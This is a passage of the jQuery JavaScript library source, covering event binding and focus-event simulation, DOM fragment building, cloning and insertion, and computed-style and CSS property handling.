			return ret;
		}
	};
});

// Support: Firefox, Chrome, Safari
// Create "bubbling" focus and blur events
if ( !support.focusinBubbles ) {
	jQuery.each({ focus: "focusin", blur: "focusout" }, function( orig, fix ) {

		// Attach a single capturing handler on the document while someone wants focusin/focusout
		var handler = function( event ) {
				jQuery.event.simulate( fix, event.target, jQuery.event.fix( event ), true );
			};

		jQuery.event.special[ fix ] = {
			setup: function() {
				var doc = this.ownerDocument || this,
					attaches = data_priv.access( doc, fix );

				if ( !attaches ) {
					doc.addEventListener( orig, handler, true );
				}
				data_priv.access( doc, fix, ( attaches || 0 ) + 1 );
			},
			teardown: function() {
				var doc = this.ownerDocument || this,
					attaches = data_priv.access( doc, fix ) - 1;

				if ( !attaches ) {
					doc.removeEventListener( orig, handler, true );
					data_priv.remove( doc, fix );

				} else {
					data_priv.access( doc, fix, attaches );
				}
			}
		};
	});
}

jQuery.fn.extend({

	on: function( types, selector, data, fn, /*INTERNAL*/ one ) {
		var origFn, type;

		// Types can be a map of types/handlers
		if ( typeof types === "object" ) {
			// ( types-Object, selector, data )
			if ( typeof selector !== "string" ) {
				// ( types-Object, data )
				data = data || selector;
				selector = undefined;
			}
			for ( type in types ) {
				this.on( type, selector, data, types[ type ], one );
			}
			return this;
		}

		if ( data == null && fn == null ) {
			// ( types, fn )
			fn = selector;
			data = selector = undefined;
		} else if ( fn == null ) {
			if ( typeof selector === "string" ) {
				// ( types, selector, fn )
				fn = data;
				data = undefined;
			} else {
				// ( types, data, fn )
				fn = data;
				data = selector;
				selector = undefined;
			}
		}
		if ( fn === false ) {
			fn = returnFalse;
		} else if ( !fn ) {
			return this;
		}

		if ( one === 1 ) {
			origFn = fn;
			fn = function( event ) {
				// Can use an empty set, since event contains the info
				jQuery().off( event );
				return origFn.apply( this, arguments );
			};
			// Use same guid so caller can remove using origFn
			fn.guid = origFn.guid || ( origFn.guid = jQuery.guid++ );
		}
		return this.each( function() {
			jQuery.event.add( this, types, fn, data, selector );
		});
	},
	one: function( types, selector, data, fn ) {
		return this.on( types, selector, data, fn, 1 );
	},
	off: function( types, selector, fn ) {
		var handleObj, type;
		if ( types && types.preventDefault && types.handleObj ) {
			// ( event )  dispatched jQuery.Event
			handleObj = types.handleObj;
			jQuery( types.delegateTarget ).off(
				handleObj.namespace ? handleObj.origType + "." + handleObj.namespace : handleObj.origType,
				handleObj.selector,
				handleObj.handler
			);
			return this;
		}
		if ( typeof types === "object" ) {
			// ( types-object [, selector] )
			for ( type in types ) {
				this.off( type, selector, types[ type ] );
			}
			return this;
		}
		if ( selector === false || typeof selector === "function" ) {
			// ( types [, fn] )
			fn = selector;
			selector = undefined;
		}
		if ( fn === false ) {
			fn = returnFalse;
		}
		return this.each(function() {
			jQuery.event.remove( this, types, fn, selector );
		});
	},

	trigger: function( type, data ) {
		return this.each(function() {
			jQuery.event.trigger( type, data, this );
		});
	},
	triggerHandler: function( type, data ) {
		var elem = this[0];
		if ( elem ) {
			return jQuery.event.trigger( type, data, elem, true );
		}
	}
});


var
	rxhtmlTag = /<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,
	rtagName = /<([\w:]+)/,
	rhtml = /<|&#?\w+;/,
	rnoInnerhtml = /<(?:script|style|link)/i,
	// checked="checked" or checked
	rchecked = /checked\s*(?:[^=]|=\s*.checked.)/i,
	rscriptType = /^$|\/(?:java|ecma)script/i,
	rscriptTypeMasked = /^true\/(.*)/,
	rcleanScript = /^\s*<!(?:\[CDATA\[|--)|(?:\]\]|--)>\s*$/g,

	// We have to close these tags to support XHTML (#13200)
	wrapMap = {

		// Support: IE9
		option: [ 1, "<select multiple='multiple'>", "</select>" ],

		thead: [ 1, "<table>", "</table>" ],
		col: [ 2, "<table><colgroup>", "</colgroup></table>" ],
		tr: [ 2, "<table><tbody>", "</tbody></table>" ],
		td: [ 3, "<table><tbody><tr>", "</tr></tbody></table>" ],

		_default: [ 0, "", "" ]
	};

// Support: IE9
wrapMap.optgroup = wrapMap.option;

wrapMap.tbody = wrapMap.tfoot = wrapMap.colgroup = wrapMap.caption = wrapMap.thead;
wrapMap.th = wrapMap.td;

// Support: 1.x compatibility
// Manipulating tables requires a tbody
function manipulationTarget( elem, content ) {
	return jQuery.nodeName( elem, "table" ) &&
		jQuery.nodeName( content.nodeType !== 11 ? content : content.firstChild, "tr" ) ?

		elem.getElementsByTagName("tbody")[0] ||
			elem.appendChild( elem.ownerDocument.createElement("tbody") ) :
		elem;
}

// Replace/restore the type attribute of script elements for safe DOM manipulation
function disableScript( elem ) {
	elem.type = (elem.getAttribute("type") !== null) + "/" + elem.type;
	return elem;
}
function restoreScript( elem ) {
	var match = rscriptTypeMasked.exec( elem.type );

	if ( match ) {
		elem.type = match[ 1 ];
	} else {
		elem.removeAttribute("type");
	}

	return elem;
}

// Mark scripts as having already been evaluated
function setGlobalEval( elems, refElements ) {
	var i = 0,
		l = elems.length;

	for ( ; i < l; i++ ) {
		data_priv.set(
			elems[ i ], "globalEval", !refElements || data_priv.get( refElements[ i ], "globalEval" )
		);
	}
}

function cloneCopyEvent( src, dest ) {
	var i, l, type, pdataOld, pdataCur, udataOld, udataCur, events;

	if ( dest.nodeType !== 1 ) {
		return;
	}

	// 1. Copy private data: events, handlers, etc.
	if ( data_priv.hasData( src ) ) {
		pdataOld = data_priv.access( src );
		pdataCur = data_priv.set( dest, pdataOld );
		events = pdataOld.events;

		if ( events ) {
			delete pdataCur.handle;
			pdataCur.events = {};

			for ( type in events ) {
				for ( i = 0, l = events[ type ].length; i < l; i++ ) {
					jQuery.event.add( dest, type, events[ type ][ i ] );
				}
			}
		}
	}

	// 2. Copy user data
	if ( data_user.hasData( src ) ) {
		udataOld = data_user.access( src );
		udataCur = jQuery.extend( {}, udataOld );

		data_user.set( dest, udataCur );
	}
}

function getAll( context, tag ) {
	var ret = context.getElementsByTagName ? context.getElementsByTagName( tag || "*" ) :
			context.querySelectorAll ? context.querySelectorAll( tag || "*" ) :
			[];

	return tag === undefined || tag && jQuery.nodeName( context, tag ) ?
		jQuery.merge( [ context ], ret ) :
		ret;
}

// Fix IE bugs, see support tests
function fixInput( src, dest ) {
	var nodeName = dest.nodeName.toLowerCase();

	// Fails to persist the checked state of a cloned checkbox or radio button.
	if ( nodeName === "input" && rcheckableType.test( src.type ) ) {
		dest.checked = src.checked;

	// Fails to return the selected option to the default selected state when cloning options
	} else if ( nodeName === "input" || nodeName === "textarea" ) {
		dest.defaultValue = src.defaultValue;
	}
}

jQuery.extend({
	clone: function( elem, dataAndEvents, deepDataAndEvents ) {
		var i, l, srcElements, destElements,
			clone = elem.cloneNode( true ),
			inPage = jQuery.contains( elem.ownerDocument, elem );

		// Fix IE cloning issues
		if ( !support.noCloneChecked && ( elem.nodeType === 1 || elem.nodeType === 11 ) &&
				!jQuery.isXMLDoc( elem ) ) {

			// We eschew Sizzle here for performance reasons: http://jsperf.com/getall-vs-sizzle/2
			destElements = getAll( clone );
			srcElements = getAll( elem );

			for ( i = 0, l = srcElements.length; i < l; i++ ) {
				fixInput( srcElements[ i ], destElements[ i ] );
			}
		}

		// Copy the events from the original to the clone
		if ( dataAndEvents ) {
			if ( deepDataAndEvents ) {
				srcElements = srcElements || getAll( elem );
				destElements = destElements || getAll( clone );

				for ( i = 0, l = srcElements.length; i < l; i++ ) {
					cloneCopyEvent( srcElements[ i ], destElements[ i ] );
				}
			} else {
				cloneCopyEvent( elem, clone );
			}
		}

		// Preserve script evaluation history
		destElements = getAll( clone, "script" );
		if ( destElements.length > 0 ) {
			setGlobalEval( destElements, !inPage && getAll( elem, "script" ) );
		}

		// Return the cloned set
		return clone;
	},

	buildFragment: function( elems, context, scripts, selection ) {
		var elem, tmp, tag, wrap, contains, j,
			fragment = context.createDocumentFragment(),
			nodes = [],
			i = 0,
			l = elems.length;

		for ( ; i < l; i++ ) {
			elem = elems[ i ];

			if ( elem || elem === 0 ) {

				// Add nodes directly
				if ( jQuery.type( elem ) === "object" ) {
					// Support: QtWebKit, PhantomJS
					// push.apply(_, arraylike) throws on ancient WebKit
					jQuery.merge( nodes, elem.nodeType ? [ elem ] : elem );

				// Convert non-html into a text node
				} else if ( !rhtml.test( elem ) ) {
					nodes.push( context.createTextNode( elem ) );

				// Convert html into DOM nodes
				} else {
					tmp = tmp || fragment.appendChild( context.createElement("div") );

					// Deserialize a standard representation
					tag = ( rtagName.exec( elem ) || [ "", "" ] )[ 1 ].toLowerCase();
					wrap = wrapMap[ tag ] || wrapMap._default;
					tmp.innerHTML = wrap[ 1 ] + elem.replace( rxhtmlTag, "<$1></$2>" ) + wrap[ 2 ];

					// Descend through wrappers to the right content
					j = wrap[ 0 ];
					while ( j-- ) {
						tmp = tmp.lastChild;
					}

					// Support: QtWebKit, PhantomJS
					// push.apply(_, arraylike) throws on ancient WebKit
					jQuery.merge( nodes, tmp.childNodes );

					// Remember the top-level container
					tmp = fragment.firstChild;

					// Ensure the created nodes are orphaned (#12392)
					tmp.textContent = "";
				}
			}
		}

		// Remove wrapper from fragment
		fragment.textContent = "";

		i = 0;
		while ( (elem = nodes[ i++ ]) ) {

			// #4087 - If origin and destination elements are the same, and this is
			// that element, do not do anything
			if ( selection && jQuery.inArray( elem, selection ) !== -1 ) {
				continue;
			}

			contains = jQuery.contains( elem.ownerDocument, elem );

			// Append to fragment
			tmp = getAll( fragment.appendChild( elem ), "script" );

			// Preserve script evaluation history
			if ( contains ) {
				setGlobalEval( tmp );
			}

			// Capture executables
			if ( scripts ) {
				j = 0;
				while ( (elem = tmp[ j++ ]) ) {
					if ( rscriptType.test( elem.type || "" ) ) {
						scripts.push( elem );
					}
				}
			}
		}

		return fragment;
	},

	cleanData: function( elems ) {
		var data, elem, type, key,
			special = jQuery.event.special,
			i = 0;

		for ( ; (elem = elems[ i ]) !== undefined; i++ ) {
			if ( jQuery.acceptData( elem ) ) {
				key = elem[ data_priv.expando ];

				if ( key && (data = data_priv.cache[ key ]) ) {
					if ( data.events ) {
						for ( type in data.events ) {
							if ( special[ type ] ) {
								jQuery.event.remove( elem, type );

							// This is a shortcut to avoid jQuery.event.remove's overhead
							} else {
								jQuery.removeEvent( elem, type, data.handle );
							}
						}
					}
					if ( data_priv.cache[ key ] ) {
						// Discard any remaining `private` data
						delete data_priv.cache[ key ];
					}
				}
			}
			// Discard any remaining `user` data
			delete data_user.cache[ elem[ data_user.expando ] ];
		}
	}
});

jQuery.fn.extend({
	text: function( value ) {
		return access( this, function( value ) {
			return value === undefined ?
				jQuery.text( this ) :
				this.empty().each(function() {
					if ( this.nodeType === 1 || this.nodeType === 11 || this.nodeType === 9 ) {
						this.textContent = value;
					}
				});
		}, null, value, arguments.length );
	},

	append: function() {
		return this.domManip( arguments, function( elem ) {
			if ( this.nodeType === 1 || this.nodeType === 11 || this.nodeType === 9 ) {
				var target = manipulationTarget( this, elem );
				target.appendChild( elem );
			}
		});
	},

	prepend: function() {
		return this.domManip( arguments, function( elem ) {
			if ( this.nodeType === 1 || this.nodeType === 11 || this.nodeType === 9 ) {
				var target = manipulationTarget( this, elem );
				target.insertBefore( elem, target.firstChild );
			}
		});
	},

	before: function() {
		return this.domManip( arguments, function( elem ) {
			if ( this.parentNode ) {
				this.parentNode.insertBefore( elem, this );
			}
		});
	},

	after: function() {
		return this.domManip( arguments, function( elem ) {
			if ( this.parentNode ) {
				this.parentNode.insertBefore( elem, this.nextSibling );
			}
		});
	},

	remove: function( selector, keepData /* Internal Use Only */ ) {
		var elem,
			elems = selector ? jQuery.filter( selector, this ) : this,
			i = 0;

		for ( ; (elem = elems[i]) != null; i++ ) {
			if ( !keepData && elem.nodeType === 1 ) {
				jQuery.cleanData( getAll( elem ) );
			}

			if ( elem.parentNode ) {
				if ( keepData && jQuery.contains( elem.ownerDocument, elem ) ) {
					setGlobalEval( getAll( elem, "script" ) );
				}
				elem.parentNode.removeChild( elem );
			}
		}

		return this;
	},

	empty: function() {
		var elem,
			i = 0;

		for ( ; (elem = this[i]) != null; i++ ) {
			if ( elem.nodeType === 1 ) {

				// Prevent memory leaks
				jQuery.cleanData( getAll( elem, false ) );

				// Remove any remaining nodes
				elem.textContent = "";
			}
		}

		return this;
	},

	clone: function( dataAndEvents, deepDataAndEvents ) {
		dataAndEvents = dataAndEvents == null ? false : dataAndEvents;
		deepDataAndEvents = deepDataAndEvents == null ? dataAndEvents : deepDataAndEvents;

		return this.map(function() {
			return jQuery.clone( this, dataAndEvents, deepDataAndEvents );
		});
	},

	html: function( value ) {
		return access( this, function( value ) {
			var elem = this[ 0 ] || {},
				i = 0,
				l = this.length;

			if ( value === undefined && elem.nodeType === 1 ) {
				return elem.innerHTML;
			}

			// See if we can take a shortcut and just use innerHTML
			if ( typeof value === "string" && !rnoInnerhtml.test( value ) &&
				!wrapMap[ ( rtagName.exec( value ) || [ "", "" ] )[ 1 ].toLowerCase() ] ) {

				value = value.replace( rxhtmlTag, "<$1></$2>" );

				try {
					for ( ; i < l; i++ ) {
						elem = this[ i ] || {};

						// Remove element nodes and prevent memory leaks
						if ( elem.nodeType === 1 ) {
							jQuery.cleanData( getAll( elem, false ) );
							elem.innerHTML = value;
						}
					}

					elem = 0;

				// If using innerHTML throws an exception, use the fallback method
				} catch( e ) {}
			}

			if ( elem ) {
				this.empty().append( value );
			}
		}, null, value, arguments.length );
	},

	replaceWith: function() {
		var arg = arguments[ 0 ];

		// Make the changes, replacing each context element with the new content
		this.domManip( arguments, function( elem ) {
			arg = this.parentNode;

			jQuery.cleanData( getAll( this ) );

			if ( arg ) {
				arg.replaceChild( elem, this );
			}
		});

		// Force removal if there was no new content (e.g., from empty arguments)
		return arg && (arg.length || arg.nodeType) ? this : this.remove();
	},

	detach: function( selector ) {
		return this.remove( selector, true );
	},

	domManip: function( args, callback ) {

		// Flatten any nested arrays
		args = concat.apply( [], args );

		var fragment, first, scripts, hasScripts, node, doc,
			i = 0,
			l = this.length,
			set = this,
			iNoClone = l - 1,
			value = args[ 0 ],
			isFunction = jQuery.isFunction( value );

		// We can't cloneNode fragments that contain checked, in WebKit
		if ( isFunction ||
				( l > 1 && typeof value === "string" &&
					!support.checkClone && rchecked.test( value ) ) ) {
			return this.each(function( index ) {
				var self = set.eq( index );
				if ( isFunction ) {
					args[ 0 ] = value.call( this, index, self.html() );
				}
				self.domManip( args, callback );
			});
		}

		if ( l ) {
			fragment = jQuery.buildFragment( args, this[ 0 ].ownerDocument, false, this );
			first = fragment.firstChild;

			if ( fragment.childNodes.length === 1 ) {
				fragment = first;
			}

			if ( first ) {
				scripts = jQuery.map( getAll( fragment, "script" ), disableScript );
				hasScripts = scripts.length;

				// Use the original fragment for the last item instead of the first because it can end up
				// being emptied incorrectly in certain situations (#8070).
				for ( ; i < l; i++ ) {
					node = fragment;

					if ( i !== iNoClone ) {
						node = jQuery.clone( node, true, true );

						// Keep references to cloned scripts for later restoration
						if ( hasScripts ) {
							// Support: QtWebKit
							// jQuery.merge because push.apply(_, arraylike) throws
							jQuery.merge( scripts, getAll( node, "script" ) );
						}
					}

					callback.call( this[ i ], node, i );
				}

				if ( hasScripts ) {
					doc = scripts[ scripts.length - 1 ].ownerDocument;

					// Reenable scripts
					jQuery.map( scripts, restoreScript );

					// Evaluate executable scripts on first document insertion
					for ( i = 0; i < hasScripts; i++ ) {
						node = scripts[ i ];
						if ( rscriptType.test( node.type || "" ) &&
							!data_priv.access( node, "globalEval" ) && jQuery.contains( doc, node ) ) {

							if ( node.src ) {
								// Optional AJAX dependency, but won't run scripts if not present
								if ( jQuery._evalUrl ) {
									jQuery._evalUrl( node.src );
								}
							} else {
								jQuery.globalEval( node.textContent.replace( rcleanScript, "" ) );
							}
						}
					}
				}
			}
		}

		return this;
	}
});

jQuery.each({
	appendTo: "append",
	prependTo: "prepend",
	insertBefore: "before",
	insertAfter: "after",
	replaceAll: "replaceWith"
}, function( name, original ) {
	jQuery.fn[ name ] = function( selector ) {
		var elems,
			ret = [],
			insert = jQuery( selector ),
			last = insert.length - 1,
			i = 0;

		for ( ; i <= last; i++ ) {
			elems = i === last ? this : this.clone( true );
			jQuery( insert[ i ] )[ original ]( elems );

			// Support: QtWebKit
			// .get() because push.apply(_, arraylike) throws
			push.apply( ret, elems.get() );
		}

		return this.pushStack( ret );
	};
});


var iframe,
	elemdisplay = {};

/**
 * Retrieve the actual display of a element
 * @param {String} name nodeName of the element
 * @param {Object} doc Document object
 */
// Called only from within defaultDisplay
function actualDisplay( name, doc ) {
	var style,
		elem = jQuery( doc.createElement( name ) ).appendTo( doc.body ),

		// getDefaultComputedStyle might be reliably used only on attached element
		display = window.getDefaultComputedStyle && ( style = window.getDefaultComputedStyle( elem[ 0 ] ) ) ?

			// Use of this method is a temporary fix (more like optimization) until something better comes along,
			// since it was removed from specification and supported only in FF
			style.display : jQuery.css( elem[ 0 ], "display" );

	// We don't have any data stored on the element,
	// so use "detach" method as fast way to get rid of the element
	elem.detach();

	return display;
}

/**
 * Try to determine the default display value of an element
 * @param {String} nodeName
 */
function defaultDisplay( nodeName ) {
	var doc = document,
		display = elemdisplay[ nodeName ];

	if ( !display ) {
		display = actualDisplay( nodeName, doc );

		// If the simple way fails, read from inside an iframe
		if ( display === "none" || !display ) {

			// Use the already-created iframe if possible
			iframe = (iframe || jQuery( "<iframe frameborder='0' width='0' height='0'/>" )).appendTo( doc.documentElement );

			// Always write a new HTML skeleton so Webkit and Firefox don't choke on reuse
			doc = iframe[ 0 ].contentDocument;

			// Support: IE
			doc.write();
			doc.close();

			display = actualDisplay( nodeName, doc );
			iframe.detach();
		}

		// Store the correct default display
		elemdisplay[ nodeName ] = display;
	}

	return display;
}
var rmargin = (/^margin/);

var rnumnonpx = new RegExp( "^(" + pnum + ")(?!px)[a-z%]+$", "i" );

var getStyles = function( elem ) {
		// Support: IE<=11+, Firefox<=30+ (#15098, #14150)
		// IE throws on elements created in popups
		// FF meanwhile throws on frame elements through "defaultView.getComputedStyle"
		if ( elem.ownerDocument.defaultView.opener ) {
			return elem.ownerDocument.defaultView.getComputedStyle( elem, null );
		}

		return window.getComputedStyle( elem, null );
	};



function curCSS( elem, name, computed ) {
	var width, minWidth, maxWidth, ret,
		style = elem.style;

	computed = computed || getStyles( elem );

	// Support: IE9
	// getPropertyValue is only needed for .css('filter') (#12537)
	if ( computed ) {
		ret = computed.getPropertyValue( name ) || computed[ name ];
	}

	if ( computed ) {

		if ( ret === "" && !jQuery.contains( elem.ownerDocument, elem ) ) {
			ret = jQuery.style( elem, name );
		}

		// Support: iOS < 6
		// A tribute to the "awesome hack by Dean Edwards"
		// iOS < 6 (at least) returns percentage for a larger set of values, but width seems to be reliably pixels
		// this is against the CSSOM draft spec: http://dev.w3.org/csswg/cssom/#resolved-values
		if ( rnumnonpx.test( ret ) && rmargin.test( name ) ) {

			// Remember the original values
			width = style.width;
			minWidth = style.minWidth;
			maxWidth = style.maxWidth;

			// Put in the new values to get a computed value out
			style.minWidth = style.maxWidth = style.width = ret;
			ret = computed.width;

			// Revert the changed values
			style.width = width;
			style.minWidth = minWidth;
			style.maxWidth = maxWidth;
		}
	}

	return ret !== undefined ?
		// Support: IE
		// IE returns zIndex value as an integer.
		ret + "" :
		ret;
}


function addGetHookIf( conditionFn, hookFn ) {
	// Define the hook, we'll check on the first run if it's really needed.
	return {
		get: function() {
			if ( conditionFn() ) {
				// Hook not needed (or it's not possible to use it due
				// to missing dependency), remove it.
				delete this.get;
				return;
			}

			// Hook needed; redefine it so that the support test is not executed again.
			return (this.get = hookFn).apply( this, arguments );
		}
	};
}


(function() {
	var pixelPositionVal, boxSizingReliableVal,
		docElem = document.documentElement,
		container = document.createElement( "div" ),
		div = document.createElement( "div" );

	if ( !div.style ) {
		return;
	}

	// Support: IE9-11+
	// Style of cloned element affects source element cloned (#8908)
	div.style.backgroundClip = "content-box";
	div.cloneNode( true ).style.backgroundClip = "";
	support.clearCloneStyle = div.style.backgroundClip === "content-box";

	container.style.cssText = "border:0;width:0;height:0;top:0;left:-9999px;margin-top:1px;" +
		"position:absolute";
	container.appendChild( div );

	// Executing both pixelPosition & boxSizingReliable tests require only one layout
	// so they're executed at the same time to save the second computation.
	function computePixelPositionAndBoxSizingReliable() {
		div.style.cssText =
			// Support: Firefox<29, Android 2.3
			// Vendor-prefix box-sizing
			"-webkit-box-sizing:border-box;-moz-box-sizing:border-box;" +
			"box-sizing:border-box;display:block;margin-top:1%;top:1%;" +
			"border:1px;padding:1px;width:4px;position:absolute";
		div.innerHTML = "";
		docElem.appendChild( container );

		var divStyle = window.getComputedStyle( div, null );
		pixelPositionVal = divStyle.top !== "1%";
		boxSizingReliableVal = divStyle.width === "4px";

		docElem.removeChild( container );
	}

	// Support: node.js jsdom
	// Don't assume that getComputedStyle is a property of the global object
	if ( window.getComputedStyle ) {
		jQuery.extend( support, {
			pixelPosition: function() {

				// This test is executed only once but we still do memoizing
				// since we can use the boxSizingReliable pre-computing.
				// No need to check if the test was already performed, though.
				computePixelPositionAndBoxSizingReliable();
				return pixelPositionVal;
			},
			boxSizingReliable: function() {
				if ( boxSizingReliableVal == null ) {
					computePixelPositionAndBoxSizingReliable();
				}
				return boxSizingReliableVal;
			},
			reliableMarginRight: function() {

				// Support: Android 2.3
				// Check if div with explicit width and no margin-right incorrectly
				// gets computed margin-right based on width of container. (#3333)
				// WebKit Bug 13343 - getComputedStyle returns wrong value for margin-right
				// This support function is only executed once so no memoizing is needed.
				var ret,
					marginDiv = div.appendChild( document.createElement( "div" ) );

				// Reset CSS: box-sizing; display; margin; border; padding
				marginDiv.style.cssText = div.style.cssText =
					// Support: Firefox<29, Android 2.3
					// Vendor-prefix box-sizing
					"-webkit-box-sizing:content-box;-moz-box-sizing:content-box;" +
					"box-sizing:content-box;display:block;margin:0;border:0;padding:0";
				marginDiv.style.marginRight = marginDiv.style.width = "0";
				div.style.width = "1px";
				docElem.appendChild( container );

				ret = !parseFloat( window.getComputedStyle( marginDiv, null ).marginRight );

				docElem.removeChild( container );
				div.removeChild( marginDiv );

				return ret;
			}
		});
	}
})();


// A method for quickly swapping in/out CSS properties to get correct calculations.
jQuery.swap = function( elem, options, callback, args ) {
	var ret, name,
		old = {};

	// Remember the old values, and insert the new ones
	for ( name in options ) {
		old[ name ] = elem.style[ name ];
		elem.style[ name ] = options[ name ];
	}

	ret = callback.apply( elem, args || [] );

	// Revert the old values
	for ( name in options ) {
		elem.style[ name ] = old[ name ];
	}

	return ret;
};


var
	// Swappable if display is none or starts with table except "table", "table-cell", or "table-caption"
	// See here for display values: https://developer.mozilla.org/en-US/docs/CSS/display
	rdisplayswap = /^(none|table(?!-c[ea]).+)/,
	rnumsplit = new RegExp( "^(" + pnum + ")(.*)$", "i" ),
	rrelNum = new RegExp( "^([+-])=(" + pnum + ")", "i" ),

	cssShow = { position: "absolute", visibility: "hidden", display: "block" },
	cssNormalTransform = {
		letterSpacing: "0",
		fontWeight: "400"
	},

	cssPrefixes = [ "Webkit", "O", "Moz", "ms" ];

// Return a css property mapped to a potentially vendor prefixed property
function vendorPropName( style, name ) {

	// Shortcut for names that are not vendor prefixed
	if ( name in style ) {
		return name;
	}

	// Check for vendor prefixed names
	var capName = name[0].toUpperCase() + name.slice(1),
		origName = name,
		i = cssPrefixes.length;

	while ( i-- ) {
		name = cssPrefixes[ i ] + capName;
		if ( name in style ) {
			return name;
		}
	}

	return origName;
}

function setPositiveNumber( elem, value, subtract ) {
	var matches = rnumsplit.exec( value );
	return matches ?
		// Guard against undefined "subtract", e.g., when used as in cssHooks
		Math.max( 0, matches[ 1 ] - ( subtract || 0 ) ) + ( matches[ 2 ] || "px" ) :
		value;
}

function augmentWidthOrHeight( elem, name, extra, isBorderBox, styles ) {
	var i = extra === ( isBorderBox ? "border" : "content" ) ?
		// If we already have the right measurement, avoid augmentation
		4 :
		// Otherwise initialize for horizontal or vertical properties
		name === "width" ? 1 : 0,

		val = 0;

	for ( ; i < 4; i += 2 ) {
		// Both box models exclude margin, so add it if we want it
		if ( extra === "margin" ) {
			val += jQuery.css( elem, extra + cssExpand[ i ], true, styles );
		}

		if ( isBorderBox ) {
			// border-box includes padding, so remove it if we want content
			if ( extra === "content" ) {
				val -= jQuery.css( elem, "padding" + cssExpand[ i ], true, styles );
			}

			// At this point, extra isn't border nor margin, so remove border
			if ( extra !== "margin" ) {
				val -= jQuery.css( elem, "border" + cssExpand[ i ] + "Width", true, styles );
			}
		} else {
			// At this point, extra isn't content, so add padding
			val += jQuery.css( elem, "padding" + cssExpand[ i ], true, styles );

			// At this point, extra isn't content nor padding, so add border
			if ( extra !== "padding" ) {
				val += jQuery.css( elem, "border" + cssExpand[ i ] + "Width", true, styles );
			}
		}
	}

	return val;
}

function getWidthOrHeight( elem, name, extra ) {

	// Start with offset property, which is equivalent to the border-box value
	var valueIsBorderBox = true,
		val = name === "width" ? elem.offsetWidth : elem.offsetHeight,
		styles = getStyles( elem ),
		isBorderBox = jQuery.css( elem, "boxSizing", false, styles ) === "border-box";

	// Some non-html elements return undefined for offsetWidth, so check for null/undefined
	// svg - https://bugzilla.mozilla.org/show_bug.cgi?id=649285
	// MathML - https://bugzilla.mozilla.org/show_bug.cgi?id=491668
	if ( val <= 0 || val == null ) {
		// Fall back to computed then uncomputed css if necessary
		val = curCSS( elem, name, styles );
		if ( val < 0 || val == null ) {
			val = elem.style[ name ];
		}

		// Computed unit is not pixels. Stop here and return.
		if ( rnumnonpx.test(val) ) {
			return val;
		}

		// Check for style in case a browser which returns unreliable values
		// for getComputedStyle silently falls back to the reliable elem.style
		valueIsBorderBox = isBorderBox &&
			( support.boxSizingReliable() || val === elem.style[ name ] );

		// Normalize "", auto, and prepare for extra
		val = parseFloat( val ) || 0;
	}

	// Use the active box-sizing model to add/subtract irrelevant styles
	return ( val +
		augmentWidthOrHeight(
			elem,
			name,
			extra || ( isBorderBox ? "border" : "content" ),
			valueIsBorderBox,
			styles
		)
	) + "px";
}

function showHide( elements, show ) {
	var display, elem, hidden,
		values = [],
		index = 0,
		length = elements.length;

	for ( ; index < length; index++ ) {
		elem = elements[ index ];
		if ( !elem.style ) {
			continue;
		}

		values[ index ] = data_priv.get( elem, "olddisplay" );
		display = elem.style.display;
		if ( show ) {
			// Reset the inline display of this element to learn if it is
			// being hidden by cascaded rules or not
			if ( !values[ index ] && display === "none" ) {
				elem.style.display = "";
			}

			// Set elements which have been overridden with display: none
			// in a stylesheet to whatever the default browser style is
			// for such an element
			if ( elem.style.display === "" && isHidden( elem ) ) {
				values[ index ] = data_priv.access( elem, "olddisplay", defaultDisplay(elem.nodeName) );
			}
		} else {
			hidden = isHidden( elem );

			if ( display !== "none" || !hidden ) {
				data_priv.set( elem, "olddisplay", hidden ? display : jQuery.css( elem, "display" ) );
			}
		}
	}

	// Set the display of most of the elements in a second loop
	// to avoid the constant reflow
	for ( index = 0; index < length; index++ ) {
		elem = elements[ index ];
		if ( !elem.style ) {
			continue;
		}
		if ( !show || elem.style.display === "none" || elem.style.display === "" ) {
			elem.style.display = show ? values[ index ] || "" : "none";
		}
	}

	return elements;
}

jQuery.extend({

	// Add in style property hooks for overriding the default
	// behavior of getting and setting a style property
	cssHooks: {
		opacity: {
			get: function( elem, computed ) {
				if ( computed ) {

					// We should always get a number back from opacity
					var ret = curCSS( elem, "opacity" );
					return ret === "" ? "1" : ret;
				}
			}
		}
	},

	// Don't automatically add "px" to these possibly-unitless properties
	cssNumber: {
		"columnCount": true,
		"fillOpacity": true,
		"flexGrow": true,
		"flexShrink": true,
		"fontWeight": true,
		"lineHeight": true,
		"opacity": true,
		"order": true,
		"orphans": true,
		"widows": true,
		"zIndex": true,
		"zoom": true
	},

	// Add in properties whose names you wish to fix before
	// setting or getting the value
	cssProps: {
		"float": "cssFloat"
	},

	// Get and set the style property on a DOM Node
	style: function( elem, name, value, extra ) {

		// Don't set styles on text and comment nodes
		if ( !elem || elem.nodeType === 3 || elem.nodeType === 8 || !elem.style ) {
			return;
		}

		// Make sure that we're working with the right name
		var ret, type, hooks,
			origName = jQuery.camelCase( name ),
			style = elem.style;

		name = jQuery.cssProps[ origName ] || ( jQuery.cssProps[ origName ] = vendorPropName( style, origName ) );

		// Gets hook for the prefixed version, then unprefixed version
		hooks = jQuery.cssHooks[ name ] || jQuery.cssHooks[ origName ];

		// Check if we're setting a value
		if ( value !== undefined ) {
			type = typeof value;

			// Convert "+=" or "-=" to relative numbers (#7345)
			if ( type === "string" && (ret = rrelNum.exec( value )) ) {
				value = ( ret[1] + 1 ) * ret[2] + parseFloat( jQuery.css( elem, name ) );
				// Fixes bug #9237
				type = "number";
			}

			// Make sure that null and NaN values aren't set (#7116)
			if ( value == null || value !== value ) {
				return;
			}

			// If a number, add 'px' to the (except for certain CSS properties)
			if ( type === "number" && !jQuery.cssNumber[ origName ] ) {
				value += "px";
			}

			// Support: IE9-11+
			// background-* props affect original clone's values
			if ( !support.clearCloneStyle && value === "" && name.indexOf( "background" ) === 0 ) {
				style[ name ] = "inherit";
			}

			// If a hook was provided, use that value, otherwise just set the specified value
			if ( !hooks || !("set" in hooks) || (value = hooks.set( elem, value, extra )) !== undefined ) {
				style[ name ] = value;
			}

		} else {
			// If a hook was provided get the non-computed value from there
			if ( hooks && "get" in hooks && (ret = hooks.get( elem, false, extra )) !== undefined ) {
				return ret;
			}

			// Otherwise just get the value from the style object
			return style[ name ];
		}
	},

	css: function( elem, name, extra, styles ) {
		var val, num, hooks,
			origName = jQuery.camelCase( name );

		// Make sure that we're working with the right name
		name = jQuery.cssProps[ origName ] || ( jQuery.cssProps[ origName ] = vendorPropName( elem.style, origName ) );

		// Try prefixed name followed by the unprefixed name
		hooks = jQuery.cssHooks[ name ] || jQuery.cssHooks[ origName ];

